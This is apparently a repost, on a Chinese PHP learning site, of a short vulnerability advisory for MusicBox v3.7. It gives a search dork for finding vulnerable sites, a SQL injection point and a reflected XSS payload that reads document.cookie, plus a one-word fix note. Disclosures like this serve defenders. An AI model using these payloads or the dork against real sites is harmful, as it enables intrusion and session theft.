来源:自学PHP网 时间:2015-04-17 14:46 作者: 阅读:次
[导读] ============================================================MusicBox = v3.7 Multiple Vulnerabilities============================================================[~] Author : R@1D3N (amin ......
|
============================================================ MusicBox <= v3.7 Multiple Vulnerabilities ============================================================
[~] Author : R@1D3N (amin emami)
[~] Software Link : www.musicboxv2.com
[~] Price : $275
[~] Version : v3.7 and previous versions
[~] Contact : aminrayden@yahoo.com
<script type="text/javascript"> /* <![CDATA[ */ (function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})(); /* ]]> */ </script> <~
[~] DorK : inurl:genre_artists.php
[~] Forum : http://ashiyane.org/forums/
[~] Greetz :ItSecTeam, Inj3ct0r, Exploit-db
[~] Tested on: Windows XP Sp3
vul1.sql injection:
/www.2cto.com /index.php?action=top&type=Songs&show=10'[ SQL ATTACK]
Vul2.Cross site Scripting:
/www.2cto.com /index.php?in=song&term="><script>alert(document.cookie)<%2Fscript>&action=search&start=0
修复:过滤 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
